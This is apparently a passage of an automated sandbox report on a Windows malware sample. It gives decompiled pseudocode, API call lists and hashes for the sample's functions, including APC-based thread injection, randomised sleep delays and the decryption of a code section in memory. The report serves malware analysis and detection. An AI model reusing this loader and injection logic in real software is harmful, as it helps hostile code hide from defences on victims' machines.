Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: a839316848d1c80145da4522c50c6151867a6b8b5fa04440e1c751a051ce6611
Instruction ID: e0afbbc42881feade9bf167bb2bde3697bf845de456dbebe66ae787ef5374ca1
Opcode Fuzzy Hash: a839316848d1c80145da4522c50c6151867a6b8b5fa04440e1c751a051ce6611
Instruction Fuzzy Hash: 95215CB870070B9FDB11DFBDC944A7E77EDAB553007204426EA45E7201EB70E905AB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1D4B, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e1a4108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e1a410c;
						if( *0x6e1a410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e1a4118;
								if( *0x6e1a4118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e1a410c);
						}
						HeapDestroy( *0x6e1a4110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e1a4108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e1a4110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e1a4130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E1A155C(E6E1A15EA, E6E1A1A86(_a12, 1, 0x6e1a4118, _t41));
							 *0x6e1a410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e1a1d4e
0x6e1a1d5a
0x6e1a1d5c
0x6e1a1d5f
0x6e1a1dd5
0x6e1a1ddb
0x6e1a1ddd
0x6e1a1ddf
0x6e1a1de5
0x6e1a1de7
0x6e1a1dec
0x6e1a1def
0x6e1a1dfa
0x6e1a1dfc
0x00000000
0x00000000
0x6e1a1dfe
0x6e1a1e01
0x6e1a1e03
0x00000000
0x00000000
0x00000000
0x6e1a1e03
0x6e1a1e0b
0x6e1a1e0b
0x6e1a1e17
0x6e1a1e17
0x6e1a1d61
0x6e1a1d62
0x6e1a1d82
0x6e1a1d88
0x6e1a1d8d
0x6e1a1d8f
0x6e1a1dcb
0x6e1a1dcb
0x6e1a1d91
0x6e1a1d99
0x6e1a1da0
0x6e1a1daa
0x6e1a1db6
0x6e1a1dbb
0x6e1a1dc2
0x6e1a1dc7
0x00000000
0x6e1a1dc7
0x6e1a1dc2
0x6e1a1d8f
0x6e1a1d62
0x6e1a1e24

APIs

InterlockedIncrement.KERNEL32(6E1A4108), ref: 6E1A1D6D
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1A1D82

Part of subcall function 6E1A155C: CreateThread.KERNELBASE ref: 6E1A1573
Part of subcall function 6E1A155C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1A1588
Part of subcall function 6E1A155C: GetLastError.KERNEL32(00000000), ref: 6E1A1593
Part of subcall function 6E1A155C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1A159D
Part of subcall function 6E1A155C: CloseHandle.KERNEL32(00000000), ref: 6E1A15A4
Part of subcall function 6E1A155C: SetLastError.KERNEL32(00000000), ref: 6E1A15AD

InterlockedDecrement.KERNEL32(6E1A4108), ref: 6E1A1DD5
SleepEx.KERNEL32(00000064,00000001), ref: 6E1A1DEF
CloseHandle.KERNEL32 ref: 6E1A1E0B
HeapDestroy.KERNEL32 ref: 6E1A1E17

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 3bfa2d9fc41a780293eba1e81a71772c3318c96817dfdf732cb3dc492a99ff11
Instruction ID: 38faa30a5f4a00f7c2302fd60a965305d1773aaf9ad5e0885b428ace81fad78e
Opcode Fuzzy Hash: 3bfa2d9fc41a780293eba1e81a71772c3318c96817dfdf732cb3dc492a99ff11
Instruction Fuzzy Hash: 072181B9700705AFCB419FEDCC8CA7E7BB8F7663607218829E615D2140DB30998ABF50

Uniqueness

Uniqueness Score: -1.00%

Function 02EA12E5, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02EA12E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2ead238 = _t10;
				if(_t10 != 0) {
					 *0x2ead1a8 = GetTickCount();
					_t12 = E02EA3E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L02EAB08A();
							_t33 = _t14 + _t16;
							_t18 = E02EA5548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E02EA4DA2(_t25) != 0) {
							 *0x2ead260 = 1; // executed
						}
						_t12 = E02EA5BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x02ea12e5
0x02ea12eb
0x02ea12ec
0x02ea12f8
0x02ea12fe
0x02ea1305
0x02ea1315
0x02ea131a
0x02ea1321
0x02ea1323
0x02ea1328
0x02ea132e
0x02ea1334
0x02ea133e
0x02ea1342
0x02ea1344
0x02ea1349
0x02ea134a
0x02ea134b
0x02ea1350
0x02ea1356
0x02ea135f
0x02ea1360
0x02ea1365
0x02ea136b
0x02ea1377
0x02ea1379
0x02ea1379
0x02ea1383
0x02ea1383
0x02ea1307
0x02ea1309
0x02ea1309
0x02ea138d

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02EA4EF2,?), ref: 02EA12F8
GetTickCount.KERNEL32 ref: 02EA130C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02EA4EF2,?), ref: 02EA1328
SwitchToThread.KERNEL32(?,00000001,?,?,?,02EA4EF2,?), ref: 02EA132E
_aullrem.NTDLL(?,?,00000009,00000000), ref: 02EA134B
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,02EA4EF2,?), ref: 02EA1365

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 9217ef4633d63805cc0715b33b739181725c63a2e8be86b2390c2eb6ca44830e
Instruction ID: 0c5c9b370bb46a9d3007d30989519dfc6ef91ac7182dddf0b72bd65064b506ed
Opcode Fuzzy Hash: 9217ef4633d63805cc0715b33b739181725c63a2e8be86b2390c2eb6ca44830e
Instruction Fuzzy Hash: 8C11E971EC0300AFE7106B65DC6AB5A3799DB44354F519915FA49CE680EBB0F4508A61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A155C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A155C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1a4140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e1a1573
0x6e1a1579
0x6e1a157d
0x6e1a1588
0x6e1a1590
0x6e1a1599
0x6e1a159d
0x6e1a15a4
0x6e1a15ab
0x6e1a15ad
0x6e1a15b3
0x6e1a1590
0x6e1a15b7

APIs

CreateThread.KERNELBASE ref: 6E1A1573
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1A1588
GetLastError.KERNEL32(00000000), ref: 6E1A1593
TerminateThread.KERNEL32(00000000,00000000), ref: 6E1A159D
CloseHandle.KERNEL32(00000000), ref: 6E1A15A4
SetLastError.KERNEL32(00000000), ref: 6E1A15AD

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: f1544a4d0a43596447135181975962fa4778b4148d8b4dcc55769478ffe331ba
Instruction ID: b77f6bf6fafe1f8c5cd54ca10b2d7cebf64136d66848f97f1cdc02521db64b75
Opcode Fuzzy Hash: f1544a4d0a43596447135181975962fa4778b4148d8b4dcc55769478ffe331ba
Instruction Fuzzy Hash: 3FF08C72204E20FBDB225BA88D0CFBFBF68FB0A701F01C404FA0691140D7318902BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02EA5BA2, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E02EA5BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02EA6C09();
				if(_t21 != 0) {
					_t59 =  *0x2ead25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2ead25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2ead160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02EA496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2ead2a8; // 0xb1a5a8
					if( *0x2ead25c > 5) {
						_t8 = _t26 + 0x2eae5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2eae9f5; // 0x44283a44
						_t27 = _t7;
					}
					E02EA729A(_t27, _t27);
					_t31 = E02EA232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x2ead270 =  *0x2ead270 ^ 0x81bbe65d;
						_t32 = E02EAA71F(0x60);
						 *0x2ead32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2ead32c; // 0x39c95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2ead32c; // 0x39c95b0
							 *_t51 = 0x2eae81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2ead238, 0, 0x43);
							 *0x2ead2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2ead25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2ead2a8; // 0xb1a5a8
								_t13 = _t58 + 0x2eae55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2eac287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02EA9135( ~_v8 &  *0x2ead270, 0x2ead00c); // executed
								_t42 = E02EA888E(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02EA87AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02EA51B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E02EA1C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2ead15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E02EAA273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x02ea5ba2
0x02ea5bad
0x02ea5bb0
0x02ea5bb3
0x02ea5bb6
0x02ea5bbd
0x02ea5bbf
0x02ea5bcb
0x02ea5bcd
0x02ea5bcd
0x02ea5bd6
0x02ea5bdc
0x02ea5be1
0x02ea5bfb
0x02ea5c07
0x02ea5c09
0x02ea5c0e
0x02ea5c18
0x02ea5c18
0x02ea5c10
0x02ea5c10
0x02ea5c10
0x02ea5c10
0x02ea5c1f
0x02ea5c2c
0x02ea5c33
0x02ea5c38
0x02ea5c38
0x02ea5c40
0x02ea5c43
0x02ea5c69
0x02ea5c75
0x02ea5c7a
0x02ea5c7f
0x02ea5c81
0x02ea5cad
0x02ea5caf
0x02ea5c83
0x02ea5c87
0x02ea5c8c
0x02ea5c91
0x02ea5c98
0x02ea5c9e
0x02ea5ca3
0x02ea5ca9
0x02ea5cb0
0x02ea5cb2
0x02ea5cb4
0x02ea5cc3
0x02ea5cc9
0x02ea5cce
0x02ea5cd0
0x02ea5d00
0x02ea5d02
0x02ea5cd2
0x02ea5cd2
0x02ea5cd8
0x02ea5ce5
0x02ea5ceb
0x02ea5ceb
0x02ea5cf3
0x02ea5cfc
0x02ea5d03
0x02ea5d05
0x02ea5d07
0x02ea5d0e
0x02ea5d1b
0x02ea5d20
0x02ea5d25
0x02ea5d27
0x02ea5d29
0x00000000
0x00000000
0x02ea5d2b
0x02ea5d30
0x02ea5d32
0x02ea5d39
0x02ea5d3d
0x02ea5d40
0x02ea5d55
0x02ea5d59
0x02ea5d5e
0x00000000
0x02ea5d5e
0x02ea5d42
0x02ea5d44
0x00000000
0x00000000
0x02ea5d4f
0x02ea5d51
0x02ea5d53
0x00000000
0x00000000
0x00000000
0x02ea5d53
0x02ea5d36
0x02ea5d36
0x02ea5d07
0x02ea5c45
0x02ea5c45
0x02ea5c4a
0x02ea5d60
0x02ea5d64
0x02ea5d6c
0x02ea5d6c
0x00000000
0x02ea5d64
0x02ea5c50
0x02ea5c53
0x02ea5c5d
0x02ea5c64
0x00000000
0x02ea5d74
0x02ea5d74
0x02ea5d78
0x02ea5d7c
0x02ea5d7c

APIs

Part of subcall function 02EA6C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,02EA5BBB,00000000,00000000), ref: 02EA6C18

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02EA5C38

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

memset.NTDLL ref: 02EA5C87
RtlInitializeCriticalSection.NTDLL(039C9570), ref: 02EA5C98

Part of subcall function 02EA1C66: memset.NTDLL ref: 02EA1C7B
Part of subcall function 02EA1C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02EA1CBD
Part of subcall function 02EA1C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02EA1CC8

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02EA5CC3
wsprintfA.USER32 ref: 02EA5CF3

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: d9fec414f7cb4ffa1e2f70bcb7ba7f4cab8f2b502121303f3c6d92ffd3c5f541
Instruction ID: e071f3168eb5336bbca96349d0e7e0f7efb768813222721ca43e88872c805ece
Opcode Fuzzy Hash: d9fec414f7cb4ffa1e2f70bcb7ba7f4cab8f2b502121303f3c6d92ffd3c5f541
Instruction Fuzzy Hash: 39513871EC0214ABDB21ABA1DCA8B9F77B8AB05708FC4D866F105DF140E774B585CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02EA62DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E02EA62DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02EAA71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02EAA734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E02EAA71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2ead278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x02ea62e1
0x02ea62e8
0x02ea62ed
0x02ea62f0
0x02ea62f7
0x02ea62fa
0x02ea62fd
0x02ea6302
0x02ea6307
0x02ea645b
0x02ea645d
0x02ea645f
0x02ea6464
0x02ea6464
0x02ea630d
0x02ea6310
0x02ea6313
0x02ea6315
0x02ea6315
0x02ea6319
0x00000000
0x00000000
0x02ea631d
0x02ea6349
0x02ea634e
0x02ea6350
0x02ea6350
0x02ea6353
0x02ea6356
0x02ea6356
0x02ea6358
0x00000000
0x02ea6323
0x02ea6325
0x02ea6344
0x02ea6344
0x02ea635b
0x02ea635b
0x02ea635c
0x02ea635c
0x02ea635f
0x00000000
0x00000000
0x00000000
0x02ea635f
0x02ea6329
0x02ea6370
0x02ea6374
0x02ea644e
0x02ea6450
0x02ea6450
0x02ea6451
0x02ea6454
0x00000000
0x02ea6454
0x02ea637d
0x02ea638e
0x02ea6392
0x02ea644a
0x00000000
0x02ea644a
0x02ea6398
0x02ea639b
0x02ea639f
0x02ea63a3
0x02ea63a8
0x02ea6440
0x02ea6440
0x00000000
0x02ea6446
0x02ea63b3
0x02ea63bc
0x02ea63d0
0x02ea63d7
0x02ea63ec
0x02ea63f2
0x02ea63fa
0x00000000
0x00000000
0x00000000
0x00000000
0x02ea63fc
0x02ea63fc
0x02ea63fc
0x02ea6403
0x02ea640b
0x00000000
0x00000000
0x02ea640d
0x02ea6416
0x00000000
0x00000000
0x00000000
0x02ea6418
0x02ea641a
0x02ea641d
0x02ea641d
0x02ea6420
0x02ea6424
0x02ea6427
0x02ea642d
0x02ea6430
0x02ea6437
0x00000000
0x02ea63b3
0x02ea632e
0x02ea6336
0x02ea633c
0x02ea633e
0x02ea633e
0x02ea6341
0x02ea6343
0x00000000
0x02ea6343
0x02ea631d
0x02ea6363
0x02ea6368
0x02ea636a
0x02ea636a
0x02ea636d
0x02ea636d
0x00000000

APIs

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

lstrcpy.KERNEL32(63699BC4,00000020), ref: 02EA63D7
lstrcat.KERNEL32(63699BC4,00000020), ref: 02EA63EC
lstrcmp.KERNEL32(00000000,63699BC4), ref: 02EA6403
lstrlen.KERNEL32(63699BC4), ref: 02EA6427

Strings

, xrefs: 02EA6370

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 8b5e48cbf28239cc4f6521086b5271701d7873cafa6d648b22bd946a267160cb
Instruction ID: ffd359be3af4b364a3109875c24592880015b63638960d3d3d0494aee9fb9da1
Opcode Fuzzy Hash: 8b5e48cbf28239cc4f6521086b5271701d7873cafa6d648b22bd946a267160cb
Instruction Fuzzy Hash: 3A51C471980218EFCF11CF59C4946ADBBBAFF82318F18D056E8259F205C770BA56CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1717, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E1A1717(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6e1a4130;
				_t50 = E6E1A193C(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6e1a4140;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6e1a51a7; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6e1a4140 = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x6e1a171e
0x6e1a172e
0x6e1a1733
0x6e1a1738
0x6e1a174d
0x6e1a1754
0x6e1a1759
0x6e1a176a
0x6e1a176d
0x6e1a1773
0x6e1a1775
0x6e1a177a
0x6e1a1856
0x6e1a1780
0x6e1a1780
0x6e1a1784
0x6e1a181c
0x6e1a178a
0x6e1a178b
0x6e1a1790
0x6e1a1793
0x6e1a1796
0x6e1a1796
0x6e1a179d
0x6e1a17a0
0x6e1a17a8
0x6e1a17a9
0x6e1a17aa
0x6e1a17b1
0x6e1a17b5
0x6e1a17bb
0x6e1a17bf
0x6e1a17c1
0x6e1a17c5
0x6e1a17c8
0x6e1a17cf
0x6e1a17d2
0x6e1a17d5
0x6e1a17da
0x6e1a17f0
0x6e1a17dc
0x6e1a17e6
0x6e1a17e8
0x6e1a17eb
0x6e1a17eb
0x6e1a17f7
0x6e1a17f7
0x6e1a17f7
0x6e1a17cf
0x6e1a1802
0x6e1a1805
0x6e1a1808
0x6e1a180f
0x6e1a1815
0x6e1a1819
0x6e1a1828
0x6e1a183d
0x6e1a182a
0x6e1a1833
0x6e1a1838
0x6e1a184e
0x6e1a184e
0x6e1a185d
0x6e1a1863

